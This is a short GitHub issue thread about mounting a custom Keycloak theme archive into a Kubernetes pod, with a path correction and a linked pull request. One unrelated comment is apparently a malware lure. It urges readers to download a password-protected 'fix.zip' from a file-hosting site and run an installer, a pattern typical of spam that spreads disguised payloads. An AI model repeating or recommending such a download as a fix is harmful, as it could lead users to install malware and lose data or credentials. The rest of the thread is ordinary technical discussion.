### ISSUE TITLE
Keycloak theme automation

### ISSUE THREAD

**Issue by RonShvarz** [kube-HPC/hkube#1991]
Once a .tar for a theme is created,
https://stackoverflow.com/questions/66964205/how-to-configure-custom-themes-for-keycloak-on-kubernetes
It needs to be mounted to the pod.

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by RonShvarz** [comment]
/opt/bitnami/keycloak/themes - our path is bitnami and not jboss as in the example

**Comment by zivglik** [comment]
PR : https://github.com/kube-HPC/helm/pull/125
